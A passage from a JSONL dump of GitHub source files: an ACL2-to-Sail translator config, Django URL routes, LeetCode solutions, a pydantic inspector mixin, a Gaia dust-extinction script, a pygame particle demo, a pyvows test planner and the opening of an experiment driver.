paths and options\n###############################################################################\n\n\n'''\nTop level file name to translate. Likely `x86.lisp` (which is located at\n`books/projects/x86isa/machine`).\n'''\nx86_project_folder = '/Users/patrick/Desktop/x86/temp/sbcl-source/acl2-8.3/books/projects/x86isa/'\ntranslateFile = 'x86.lisp'\ntranslatePath = os.path.join(x86_project_folder, 'machine', translateFile)\n\n\n'''\nPath to the ACL2 executable, which is likely called `saved_acl2`.\nPort on localhost the ACL2 instance listens on for expansion requests.\n'''\nacl2Process = '/Users/patrick/Desktop/x86/temp/sbcl-source/acl2-8.3/saved_acl2'\nacl2Port = 1159\n\n\n'''\nOutput folder for translated files.\n'''\noutputFolder = '/Users/Patrick/Desktop/x86_cleaned/model'\n\n\n'''\nOutput path to the translation of `utilities.lisp`, which is handled manually\nby `generateUtils.py`.\n'''\nutilitiesFile = os.path.join(outputFolder, \"utils.sail\")\n\n\n'''\nOutput paths for file which log data about the type resolution algorithm\n'''\nunresolvedTypesFile = '/Users/patrick/Desktop/x86_cleaned/unresolvedTypes.txt'\n\n\n'''\n`mbe` forms allow us to choose between translating the `:logic` or `:exec`\nbranches. See tr_mbe in specialTokens.py for more information or:\nhttp://www.cs.utexas.edu/users/moore/acl2/manuals/current/manual/index.html?topic=ACL2____MBE\n'''\nmbe_branch = ':logic'\n#mbe_branch = ':exec'\n\n\n'''\nThe Lisp form `the` translates to a dynamic type check in Sail. Many `the`\nforms use very big numbers to denote the range in which there argument must\nlie, and this clutters up the code. In the absence of the numbers being\nshortened (e.g. by calculating the value or assigning them a name) it is\npossible to skip out the dynamic type check completely. This is because the\ntypes they specify are proved statically by ACL2. It does, however, require\ncorrect implementation of the handwritten functions - so take care if setting\nthis to False.\n'''\ntranslate_the = False\n\n\n'''\nPrinting interactions with the running ACL2 instance can increased the amount\nof terminal output substantially but help debug problems. \n'''\nprint_acl2_interactions = False\n\n\n'''\nCheck all necessary paths have been specified and mbe_branch is well-formed.\n'''\nif any([path is None for path in [acl2Process, outputFolder, unresolvedTypesFile, utilitiesFile]]):\n\tsys.exit(\"Please specify file paths in config_files.py\")\n\nif mbe_branch not in [':logic', ':exec']:\n\tsys.exit(f\"configuration.py: mbe_branch should be either ':logic' or ':exec', not {mbe_branch}\")\n\n\n\n","repo_name":"paddy10663/x86-ACL2-to-Sail","sub_path":"translator/config_files.py","file_name":"config_files.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7347046652","text":"from django.urls import path\nfrom .views import GenreListAPIView, GenreDetailAPIView\n# from .views import GenreListAPIView, GenreDetailAPIView, user_list, user_detail\n\nfrom .views import *\n\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nurlpatterns = [\n\n path('login/', obtain_jwt_token),\n\n path('genres/', GenreListAPIView.as_view()),\n path('genres//', GenreDetailAPIView.as_view()),\n\n path('users/', views.user_list),\n path('users//', views.user_detail),\n\n path('comments/', views.comment_list),\n# path('users/', user_list),\n# path('users//', user_detail),\n\n path('books/', get_books),\n path('books//', BookAPIView),\n]","repo_name":"GoldenDrag/Bookdom","sub_path":"back/bdback/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24577830974","text":"class Solution(object):\n def findRestaurant(self, list1, list2):\n anshash = {}\n uphash = {}\n downhash = {}\n l1 = len(list1)\n l2 = len(list2)\n mxlen = l1 if l1 > l2 else l2\n mnidx = 2000\n\n\n for i in range(mxlen):\n if i < l1: # make the uphash\n uphash.setdefault(list1[i], i)\n if downhash.get(list1[i], None) != None:\n if i + downhash[list1[i]] <= mnidx:\n mnidx = i + downhash[list1[i]]\n anshash[list1[i]] = mnidx\n\n if i < l2: # make the downhash\n downhash.setdefault(list2[i], i)\n if uphash.get(list2[i], None) != None:\n if i + uphash[list2[i]] <= mnidx:\n mnidx = i + uphash[list2[i]]\n anshash[list2[i]] = mnidx\n return list(anshash.keys())\n\nl1 = [\"Shogun\", \"Tapioca Express\", \"Burger King\", \"KFC\"]\nl2 = [\"Piatti\", \"The Grill at Torrey Pines\", \"Hungry Hunter Steakhouse\", \"Shogun\"]\n\nl3 = [\"Shogun\", \"Tapioca Express\", \"Burger King\", \"KFC\"]\nl4 = [\"KFC\", \"Shogun\", \"Burger King\"]\n\nl5 = [\"Shogun\",\"Tapioca Express\",\"Burger King\",\"KFC\"]\nl6 = [\"KFC\",\"Burger King\",\"Tapioca Express\",\"Shogun\"]\n\nprint(Solution().findRestaurant(l5, l6))","repo_name":"digression99/python_study2","sub_path":"leet599.py","file_name":"leet599.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"43084823849","text":"from django.urls import path\nfrom .views import CharacterAPICall,StoryAPICall,StoryViewAPICall\n\napp_name = 'story'\n\nurlpatterns = [\n path('', StoryAPICall.as_view(), name='story'),\n path('/', StoryViewAPICall.as_view(), name='story_view'),\n path('character/', CharacterAPICall.as_view(), name='character'),\n]","repo_name":"JayG-5/like_andersen","sub_path":"backend/story/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74454834927","text":"import abc\nimport enum\nfrom functools import partial\nfrom typing import Any, Generic, TypeVar\n\nimport pydantic\n\n\nFieldType = TypeVar(\"FieldType\")\n\n\nclass InspectableField(pydantic.generics.GenericModel, Generic[FieldType], abc.ABC):\n name: str\n value: FieldType\n inspector_type: str | None = None\n mutable: bool = True\n\n @property\n def label(self):\n return self.name.replace(\"_\", \" \").capitalize()\n\n def set_value(self, value: FieldType) -> FieldType:\n self.value = value\n setattr(self.__class__, self.name, value)\n return value\n\n\nclass TextInspectableField(InspectableField[str]):\n inspector_type = \"text\"\n\n\nclass HiddenInspectableField(InspectableField[FieldType]):\n inspector_type: None = None\n mutable: bool = False\n\n\nclass InfoInspectableField(InspectableField[Any]):\n inspector_type = \"info\"\n mutable: bool = False\n\n\nclass NumberInspectableField(InspectableField[int | float]):\n inspector_type = \"number\"\n\n\nclass EnumInspectableField(InspectableField[enum.Enum]):\n inspector_type = \"select\"\n options: list[tuple[str, Any]] = pydantic.Field(default_factory=list)\n enum_type: type[enum.Enum] = pydantic.Field(default=enum.Enum)\n\n @property\n def options(self):\n return [(option.name, option.value) for option in self.enum_type]\n\n def set_value(self, value: enum.Enum):\n return super().set_value(self.enum_type(value))\n\n\nclass InspectorMixin:\n @property\n def inspectables(self) -> dict[str, InspectableField]:\n field_types = self.field_types()\n excluded_fields = [field_name for field_name, field in field_types.items() if field is HiddenInspectableField]\n inspectables = dict()\n for field in self.__fields__.values():\n if field.name not in excluded_fields:\n factory = field_types.get(field.name, self.default_field_factory(field.type_))\n inspectables[field.name] = factory(name=field.name, value=getattr(self, field.name))\n return inspectables\n\n @property\n def field_types(self) -> dict[str, InspectableField]:\n return {}\n\n def default_field_factory(self, field_type: type) -> type[InspectableField]:\n if issubclass(field_type, enum.Enum):\n return partial(EnumInspectableField, enum_type=field_type)\n if issubclass(field_type, str):\n return TextInspectableField\n if issubclass(field_type, (int, float)):\n return NumberInspectableField\n else:\n return InfoInspectableField\n\n def get_inspectables(self) -> list[InspectableField]:\n return self.inspectables.values()\n\n def get_inspectable(self, name: str) -> InspectableField | None:\n return self.inspectables.get(name)\n\n def set_inspectable(self, name: str, value: Any) -> None:\n inspectable = self.inspectables[name]\n if inspectable.mutable:\n value = self.inspectables[name].set_value(value)\n self.__setattr__(name, value)\n","repo_name":"askepen/sea2023","sub_path":"src/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17095221983","text":"import discord\r\nfrom discord.ext import commands\r\nimport requests\r\nfrom api import API\r\n\r\nclass CommandsCog(commands.Cog, name=\"All Commands\"):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n async def stats(self, ctx, *args):\r\n if len(args) < 2:\r\n await ctx.send('Usage: !stats `platform` `username`\\nPlatforms: `uplay`, `psn`, `xbl`')\r\n return\r\n\r\n platforms = ['uplay','psn', 'xbl']\r\n platform = args[0].lower()\r\n username = args[1]\r\n\r\n if platform not in platforms:\r\n await ctx.send('Not a valid platform.\\nValid platforms: `uplay`, `psn`, `xbl`')\r\n return\r\n if not API(platform, username).verify():\r\n await ctx.send(f'Could not find the user `{username}` on the platform `{platform}`\\nValid platforms: `uplay`, `psn`, `xbl`')\r\n return\r\n \r\n stats = API(platform, username).getInfo()\r\n pretty_stat_names = {'level': 'Level',\r\n 'rank': 'Rank',\r\n 'mmr': 'MMR',\r\n 'kd': 'Ranked K/D'}\r\n\r\n embed = discord.Embed(title=stats['p_name'], color=0x2ecc71)\r\n for key, value in stats.items():\r\n if key != 'pfp' and key != 'p_name':\r\n embed.add_field(name=pretty_stat_names[key], value=value, inline=False)\r\n embed.set_image(url=stats['pfp'])\r\n embed.set_footer(text='Made by andreas#8860.\\nData from R6Tab')\r\n await ctx.send(embed=embed)\r\n\r\ndef setup(bot):\r\n bot.add_cog(CommandsCog(bot))","repo_name":"WaddledAway/R6-Stat-bot","sub_path":"r6_stat_bot/r6_stat_bot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9213637738","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport csv\nimport json\nimport os\nimport string\n\nfrom django.conf import settings\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.models import Count\n\nfrom slugify import slugify\n\nfrom scuole.core.replacements import ISD_REPLACEMENT\nfrom scuole.core.utils import massage_name, remove_charter_c\nfrom scuole.counties.models import County\nfrom scuole.districts.models import District\n\nfrom ...models import Campus, Principal\n\nLOCALE_MAP = {\n \"11\": \"LARGE_CITY\",\n \"12\": \"MID_SIZE_CITY\",\n \"13\": \"SMALL_CITY\",\n \"21\": \"LARGE_SUBURB\",\n \"22\": \"MID_SIZE_SUBURB\",\n \"23\": \"SMALL_SUBURB\",\n \"31\": \"FRINGE_TOWN\",\n \"32\": \"DISTANT_TOWN\",\n \"33\": \"REMOTE_TOWN\",\n \"41\": \"FRINGE_RURAL\",\n \"42\": \"DISTANT_RURAL\",\n \"43\": \"REMOTE_RURAL\",\n}\n\n\nclass Command(BaseCommand):\n help = \"Bootstraps Campus models using TEA, FAST and AskTED data.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"year\", nargs=\"?\", type=str, default=None)\n\n def handle(self, *args, **options):\n if options[\"year\"] is None:\n raise CommandError(\"A year is required.\")\n\n # path to FAST file where original cleaned up names are stored\n fast_file = os.path.join(settings.DATA_FOLDER, \"fast\", \"fast-campus.csv\")\n\n self.fast_data = self.load_fast_file(fast_file)\n\n # path to TAPR file where campus shapefiles are stored\n campus_file = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"shapes\",\n \"campuses.geojson\",\n )\n\n self.shape_data = self.load_geojson_file(campus_file)\n\n # path to file where new, cleaned up campus names and IDs are stored\n new_campuses = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"updates\",\n options[\"year\"],\n \"new_campuses.csv\",\n )\n\n self.newCampus_data = self.load_newCampus_file(new_campuses)\n\n # path to file where new, cleaned up names and IDs of campuses whose\n # names have changed since the last update\n changed_campuses = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"updates\",\n options[\"year\"],\n \"changed_campuses.csv\",\n )\n\n self.changedCampus_data = self.load_changedCampus_file(changed_campuses)\n\n tea_file = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"reference\",\n \"reference.csv\",\n )\n\n with open(tea_file, \"rU\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n self.create_campus(row)\n\n self.make_slugs_unique()\n\n def load_fast_file(self, file):\n payload = {}\n\n with open(file, \"r\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n payload[row[\"Campus Number\"]] = row\n\n return payload\n\n def load_geojson_file(self, file):\n payload = {}\n\n with open(file, \"r\") as f:\n data = json.load(f)\n\n for feature in data[\"features\"]:\n tea_id = feature[\"properties\"][\"CAMPUS\"]\n payload[tea_id] = feature[\"geometry\"]\n\n return payload\n\n def load_newCampus_file(self, file):\n payload = {}\n\n with open(file, \"rU\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n tea_id = row[\"Campus Number\"]\n payload[tea_id] = row\n\n return payload\n\n def load_changedCampus_file(self, file):\n payload = {}\n\n with open(file, \"rU\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n tea_id = row[\"Campus Number\"]\n payload[tea_id] = row\n\n return payload\n\n def create_campus(self, campus):\n campus_id = str(int(campus[\"CAMPUS\"]))\n\n # first looks to see if the campus' ID is in both changed campus\n # and FAST data. If it is, it uses the changed name not the FAST name\n if campus_id in self.changedCampus_data and self.fast_data:\n fast_match = self.changedCampus_data[campus_id]\n # then it looks to see if the ID is in the new data\n elif campus_id in self.newCampus_data:\n # if it is it'll use the name in the new campus CSV\n fast_match = self.newCampus_data[campus_id]\n # if it's not in the update or new list, it'l use the FAST name\n elif campus_id in self.fast_data:\n fast_match = self.fast_data[campus_id]\n # if it's not in new, updated or FAST- it gets massaged with our\n # name massager\n else:\n fast_match = {\n \"Campus Name\": massage_name(campus[\"CAMPNAME\"], ISD_REPLACEMENT)\n }\n\n name = remove_charter_c(fast_match[\"Campus Name\"])\n self.stdout.write(\"Creating {}...\".format(name))\n\n low_grade, high_grade = campus[\"GRDSPAN\"].split(\" - \")\n district = District.objects.get(tea_id=campus[\"DISTRICT\"])\n county = County.objects.get(name__iexact=campus[\"CNTYNAME\"])\n\n if campus[\"CFLCHART\"] == \"N\":\n charter = False\n else:\n charter = True\n\n if campus[\"CAMPUS\"] in self.shape_data:\n geometry = GEOSGeometry(json.dumps(self.shape_data[campus[\"CAMPUS\"]]))\n else:\n self.stderr.write(\"No shape data for {}\".format(name))\n geometry = None\n\n instance, _ = Campus.objects.update_or_create(\n tea_id=campus[\"CAMPUS\"],\n defaults={\n \"name\": name,\n \"slug\": slugify(name),\n \"charter\": charter,\n \"coordinates\": geometry,\n \"low_grade\": low_grade,\n \"high_grade\": high_grade,\n \"school_type\": campus[\"GRDTYPE\"],\n \"district\": district,\n \"county\": county,\n },\n )\n\n def make_slugs_unique(self):\n for district in District.objects.all():\n\n models = (\n district.campuses.values(\"slug\")\n .annotate(Count(\"slug\"))\n .order_by()\n .filter(slug__count__gt=1)\n )\n slugs = [i[\"slug\"] for i in models]\n\n campuses = district.campuses.filter(slug__in=slugs)\n\n for campus in campuses:\n campus.slug = \"{0}-{1}-{2}\".format(\n campus.slug, campus.low_grade, campus.high_grade\n )\n campus.save()\n","repo_name":"texastribune/scuole","sub_path":"scuole/campuses/management/commands/bootstrapcampuses.py","file_name":"bootstrapcampuses.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11557044775","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n #handle edge case in case if empty as shown\n if t == \"\":\n return \" \"\n #Create two windows one with current values and the second with values required\n countT, window = {}, {}\n #initialize our count T\n for cha in t:\n #char may not have been added yet so we use get and assign default values\n countT[cha] = 1 + countT.get(cha, 0)\n #what we current have, what we need\n current, need = 0, len(countT)\n #-1 and -1 for right and left\n result,resultLen = [-1, -1], float(\"infinity\")\n #iterate through every character in s\n left = 0\n for right in range(len(s)):\n #new var to store s at r\n cha = s[right]\n #if c has never been added to window, it will get it \n window [cha]= 1 + window.get(cha,0)\n \n #if we satisfy the condition of what we are looking for\n if cha in countT and window[cha] == countT[cha]:\n current += 1\n #loop to see if the current and need are equal\n while current == need:\n #update the result by calculating size of the window\n if ( right - left + 1) < resultLen:\n result = (left,right)\n resultLen = ( right - left + 1)\n #making the list smaller by popping from the left of our window\n window[s[left]] -= 1\n if s[left] in countT and window[s[left]] < countT[s[left]]:\n current -= 1\n left += 1\n \n left,right = result\n return s[left:right+1] if resultLen != float(\"infinity\") else \"\"\n \n \n \n \n \n \n ","repo_name":"VeldaKiara/Leetcode","sub_path":"76-minimum-window-substring/76-minimum-window-substring.py","file_name":"76-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"2"} +{"seq_id":"14874188689","text":"#!/usr/bin/env python3\n# example_02.py\n\nimport pygame\nimport particlepy\nimport sys\nimport time\nimport random\n\n\ndef palette_swap(surface: pygame.Surface, old_color, new_color):\n surf_copy = surface.copy()\n img_copy = pygame.Surface(surf_copy.get_size())\n img_copy.fill(new_color)\n surf_copy.set_colorkey(old_color)\n img_copy.blit(surf_copy, (0, 0))\n img_copy.set_colorkey((0, 0, 0))\n return img_copy\n\n\npygame.init()\n\n# pygame config\nSIZE = 800, 800\nSCALE_RATIO = 4\nscreen = pygame.display.set_mode(SIZE)\npygame.display.set_caption(\"ParticlePy example program\")\npygame.mouse.set_visible(False)\n\n# surfaces\ndisplay = pygame.Surface(tuple(item // SCALE_RATIO for item in SIZE))\ndisplay.set_colorkey((0, 0, 0))\n\n# timing\nclock = pygame.time.Clock()\nFPS = 60\n\n# delta time\nold_time = time.time()\ndelta_time = 0\n\n# particle system to manage particles\nparticle_system = particlepy.particle.ParticleSystem()\n\n# load image\nimage = pygame.image.load(\"data/image.png\").convert_alpha()\n\n# main loop\nwhile True:\n # quit window\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n # delta time\n now = time.time()\n delta_time = now - old_time\n old_time = now\n\n # update particle properties\n particle_system.update(delta_time=delta_time, gravity=(0, -3))\n\n # get mouse position\n mouse_pos = tuple(pos // SCALE_RATIO for pos in pygame.mouse.get_pos())\n\n for _ in range(6):\n particle_system.emit(\n particlepy.particle.Particle(shape=particlepy.shape.Image(surface=image, size=(25, 25), alpha=255),\n position=mouse_pos,\n velocity=(random.uniform(-80, 80), random.uniform(-80, 80)),\n delta_radius=0.5))\n\n # render shapes\n particle_system.make_shape()\n\n # render particles\n particle_system.render(surface=display)\n\n # update display\n screen.blit(pygame.transform.scale(palette_swap(display, (255, 255, 255), (90, 90, 90)), SIZE), (-20, 15))\n screen.blit(pygame.transform.scale(display, SIZE), (0, 0))\n pygame.display.update()\n\n screen.fill((22, 27, 34))\n display.fill((0, 0, 0))\n\n clock.tick(60)\n","repo_name":"grimmigerFuchs/ParticlePy","sub_path":"examples/example_02.py","file_name":"example_02.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"2296496421","text":"# -*- coding: utf-8 -*-\n'''The logic PyVows uses to discover contexts and vows'''\n\nimport inspect\nimport re\n\n\nclass ExecutionPlanner(object):\n def __init__(self, suites, exclusion_patterns, inclusion_patterns):\n self.suites = suites\n if exclusion_patterns and inclusion_patterns:\n raise Exception('Using both exclusion_patterns and inclusion_patterns is not allowed')\n self.exclusion_patterns = set([re.compile(x) for x in exclusion_patterns])\n self.inclusion_patterns = set([re.compile(x) for x in inclusion_patterns])\n\n def plan(self):\n plan = {}\n for suiteName, contextClasses in self.suites.items():\n plan[suiteName] = {\n 'contexts': {}\n }\n for contextClass in contextClasses:\n contextPlan, isRequired = self.plan_context(contextClass, '')\n if isRequired and not self.is_excluded(contextPlan['name']):\n plan[suiteName]['contexts'][contextClass.__name__] = contextPlan\n return plan\n\n def is_excluded(self, name):\n '''Return whether `name` is in `self.exclusion_patterns`.'''\n\n for pattern in self.exclusion_patterns:\n if pattern.search(name):\n return True\n return False\n\n def is_included(self, name):\n '''Return whether `name` is in `self.inclusion_patterns`.'''\n\n if not self.inclusion_patterns:\n return True\n\n for pattern in self.inclusion_patterns:\n if pattern.search(name):\n return True\n return False\n\n def plan_context(self, contextClass, idBase):\n context = {\n 'name': contextClass.__name__,\n 'id': idBase + ('.' if idBase else '') + contextClass.__name__,\n 'contexts': {},\n 'vows': []\n }\n\n special_names = set(['setup', 'teardown', 'topic'])\n if hasattr(contextClass, 'ignored_members'):\n special_names.update(contextClass.ignored_members)\n\n # remove any special methods\n contextMembers = [\n (name, value) for name, value in inspect.getmembers(contextClass)\n if name not in special_names and not name.startswith('_')\n ]\n\n context['vows'] = [\n name for name, vow in contextMembers\n if (inspect.ismethod(vow) or inspect.isfunction(vow))\n and self.is_included(context['id'] + '.' + name)\n and not self.is_excluded(name)\n ]\n\n subcontexts = [\n (name, subcontext) for name, subcontext in contextMembers\n if inspect.isclass(subcontext) and not self.is_excluded(name)\n ]\n\n for name, subcontext in subcontexts:\n subcontextPlan, subcontextContainsIncludedSubcontexts = self.plan_context(subcontext, context['id'])\n if self.is_included(subcontextPlan['id']) or subcontextContainsIncludedSubcontexts:\n context['contexts'][name] = subcontextPlan\n\n if self.inclusion_patterns:\n contextRequiredBecauseItContainsVowsOrSubcontexts = bool(context['contexts']) or bool(context['vows'])\n else:\n contextRequiredBecauseItContainsVowsOrSubcontexts = True\n\n return context, contextRequiredBecauseItContainsVowsOrSubcontexts\n","repo_name":"heynemann/pyvows","sub_path":"pyvows/runner/executionplan.py","file_name":"executionplan.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"2"} +{"seq_id":"40222488991","text":"from logger_init import init_logger\n\n\ndef add_step(value, step):\n logger = init_logger(\"add_step\")\n value_list = str.split(value, \";\")\n logger.debug(value_list)\n step_list = str.split(step, \";\")\n for i in value_list:\n if i.find(\"=\") == -1:\n value_list.remove(i)\n for i in step_list:\n if i.find(\"=\") == -1:\n step_list.remove(i)\n logger.debug(value_list)\n\n for index, elem in enumerate(value_list):\n logger.debug(str.split(elem, \"=\"))\n start_value = str.split(elem, \"=\")[1]\n old_val = start_value\n step_to_add = str.split(step_list[index], \"=\")[1]\n\n if not any(c.isalpha() for c in step_to_add) \\\n and not any(c.isalpha() for c in start_value):\n if step_list[index].find(\"-\") == -1:\n start_value = \" \" + str(float(start_value)\n + float(step_to_add))\n else:\n start_value = \" \" + str(float(start_value)\n - float(step_to_add))\n else:\n start_value += step_to_add\n\n start_value += \";\"\n value_list[index] = str.replace(value_list[index], old_val, start_value)\n\n logger.info(\"End adding step values to value result: \" + ''.join(value_list))\n return ''.join(value_list)\n\n","repo_name":"marwin1991/ComplexityEstimator","sub_path":"complexity_estimator_by_pz/step_counter.py","file_name":"step_counter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"74454826927","text":"\"\"\"\nCreated on Wed Jul 24 18:42:29 2019\n\nApplication of (Green + Lallement) combined map to Gaia data. \n\n@author: Skevja\n\"\"\"\n\nimport numpy as np \nfrom astropy.table import Table\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom dustmaps.bayestar import BayestarQuery\nimport time \n\nt1 = time.time()\n\ntable_name = 'gaia_example_trans_r'\n\nprint('Reading data...',end=' ')\nt = Table.read(''.join((table_name,'.csv')))\n\nprint('ok.\\nCreating coordinates...',end=' ')\ncoords = SkyCoord(t['lon']*u.deg,t['lat']*u.deg,\n distance=t['d']*u.pc,frame='galactic')\n\nprint('ok.\\nGetting extinction...',end=' ')\nbayestar = BayestarQuery(max_samples=1)\nA_v = 2.742*bayestar(coords)\n\nprint('ok.\\nColour transformations...',end=' ' )\n# Transformation coefficients can be found at http://stev.oapd.inaf.it/cgi-bin/cmd\n# (after you submit a request for some isochrone, there will a be a small table \n# at the new page). Just use Gaia passbands. \n\nA_g = 0.83627*A_v\nA_bp = 1.08337*A_v\nA_rp = 0.63439*A_v\n# This was some old check, probably not needed, extinction must be positive all the time. \nA_g[A_g < 0] = 0 \nA_bp[A_bp < 0] = 0 \nA_rp[A_rp < 0] = 0 \n\nprint('ok.\\nSaving data...',end=' ')\n# And save the table with new columns\nt['phot_g_mean_mag_0g'] = np.subtract(t['phot_g_mean_mag'],A_g)\nt['phot_bp_mean_mag_0g'] = np.subtract(t['phot_bp_mean_mag'],A_bp)\nt['phot_rp_mean_mag_0g'] = np.subtract(t['phot_rp_mean_mag'],A_rp)\nt['M_G_0g'] = np.subtract(t['M_G'],A_g)\nt['M_BP_0g'] = np.subtract(t['M_BP'],A_bp)\nt['M_RP_0g'] = np.subtract(t['M_RP'],A_rp)\nt['A_g_g'] = A_g\nt['A_bp_g'] = A_bp\nt['A_rp_g'] = A_rp\n\n# We combine two maps: when A=0 in Green map, we use extinction from Lallement. \n# G\nt['phot_g_mean_mag_0gl'] = t['phot_g_mean_mag_0g']\nt['phot_g_mean_mag_0gl'][t['A_g_g']==0] = t['phot_g_mean_mag_0l']\nt['M_G_0gl'] = t['M_G_0g']\nt['M_G_0gl'][t['A_g_g']==0] = t['M_G_0l']\n# BP\nt['phot_bp_mean_mag_0gl'] = t['phot_bp_mean_mag_0g']\nt['phot_bp_mean_mag_0gl'][t['A_bp_g']==0] = t['phot_bp_mean_mag_0l']\nt['M_BP_0gl'] = t['M_BP_0g']\nt['M_BP_0gl'][t['A_bp_g']==0] = t['M_BP_0l']\n# RP\nt['phot_rp_mean_mag_0gl'] = t['phot_rp_mean_mag_0g']\nt['phot_rp_mean_mag_0gl'][t['A_rp_g']==0] = t['phot_rp_mean_mag_0l']\nt['M_RP_0gl'] = t['M_RP_0g']\nt['M_RP_0gl'][t['A_rp_g']==0] = t['M_RP_0l']\n\nt.write(''.join((table_name,'_r.csv')),overwrite=True)\n\nprint('ok.\\nDone.')\n\nprint(round((time.time()-t1)/60,2), 'min ==', round((time.time()-t1)/3600,2), 'h')\n\n","repo_name":"askenja/jj_complementary","sub_path":"dereddening/application/deredden_green.py","file_name":"deredden_green.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32535983554","text":"class Solution:\n def thirdMax(self, nums: List[int]) -> int:\n s=set()\n for num in nums:\n if len(s)<3 :\n s.add(num)\n elif num>min(s) and num not in s:\n s.add(num)\n s.remove(min(s))\n \n if len(s)<3:\n return max(s)\n\n return min(s)\n\n # #if the new number is larger than the smallest of smallest\n # #add it to the set and remove the previous\n","repo_name":"kcandost/A2SV.SG","sub_path":"414. Third Maximum Number.py","file_name":"414. Third Maximum Number.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15073313247","text":"import collections\n\n\ndef solution(N, infos):\n graph = collections.defaultdict(list)\n in_degree = [0 for _ in range(N + 1)]\n in_degree[0] = -1\n # 해당 건물을 짓는데 걸리는 시간을 저장하는 변수\n times = [0]\n # 해당 건물을 짓는데 걸리는 총 시간(이전 건물 짓는 시간 포함)을 저장하는 변수\n distances = [0 for _ in range(N + 1)]\n\n # 그래프 구하기 및 in_degree 구하기\n for u in range(N):\n w = infos[u][0]\n times.append(w)\n for i in range(1, len(infos[u]) - 1):\n graph[infos[u][i]].append(u + 1)\n in_degree[u + 1] += 1\n\n # in_degree가 0인 애들을 시작 정점으로설정\n starts = []\n for i in range(1, N + 1):\n if in_degree[i] == 0:\n starts.append(i)\n distances[i] = times[i]\n\n visit = [False for _ in range(N + 1)]\n\n for start in starts:\n Q = collections.deque()\n Q.append(start)\n visit[start] = True\n\n while Q:\n vertex = Q.popleft()\n\n for adjacent in graph[vertex]:\n if not visit[adjacent]:\n in_degree[adjacent] -= 1\n if in_degree[adjacent] <= 0:\n visit[adjacent] = True\n Q.append(adjacent)\n # 해당 건물을 짓는 총 시간은 = max(해당 건물을 짓는 총 시간, 현재 건물을 짓는 총시간 + 해당 건물을 짓는 시간)\n distances[adjacent] = max(distances[adjacent], distances[vertex] + times[adjacent])\n\n for i in range(1, N + 1):\n print(distances[i])\n\n\nN = int(input())\ninfos = [list(map(int, input().split())) for _ in range(N)]\nsolution(N, infos)\n","repo_name":"gudwh14/algorithm","sub_path":"boj/graph/위상정렬 - 게임 개발.py","file_name":"위상정렬 - 게임 개발.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19908335387","text":"# Main entry point for executing experiments\nimport argparse\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport os\nfrom scipy.sparse import load_npz\nfrom sklearn import tree\nfrom tqdm import tqdm\n\nsns.set_theme(style='white', font_scale=1.5)\n\nfrom partition import PerformancePartitioner\n\nimport pdb\n\ndef main():\n parser = argparse.ArgumentParser(description='Experiment Driver')\n parser.add_argument(\n '--outpath',\n default='./experiments/run_bigger_test_set/',\n help='where to save results'\n )\n parser.add_argument(\n '--model_path',\n default='./20220629_model_info/label_HCT_deploy.pkl',\n help='where the model lives'\n )\n parser.add_argument(\n '--label_path',\n default='./20220629_model_info/label_HCT_yhats',\n help='where the test set labels and predictions live'\n )\n parser.add_argument(\n '--feature_path',\n 